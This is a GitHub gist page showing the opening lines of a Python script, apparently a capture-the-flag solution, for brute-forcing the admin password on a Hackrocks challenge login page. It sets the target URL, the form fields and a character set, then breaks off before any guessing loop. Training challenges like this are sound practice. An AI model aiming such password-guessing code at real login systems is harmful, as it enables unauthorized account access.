Skip to content

Instantly share code, notes, and snippets.

View HenrikThien's full-sized avatar
💻
(visitor.IsHappy) ? MyState.HappyAsWell : MyState.Sad;

Henrik Thien HenrikThien

💻
(visitor.IsHappy) ? MyState.HappyAsWell : MyState.Sad;
View GitHub Profile
@HenrikThien
HenrikThien / py
Created February 16, 2021 19:57
Ironhack Hackrocks password brutforce
import requests
import re
url = "https://challenges.hackrocks.com/the-chattering-programmer/login"
data = {'login': 'admin', 'password': ''}
charSet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
passwordString = []
lastCorrectCount = 0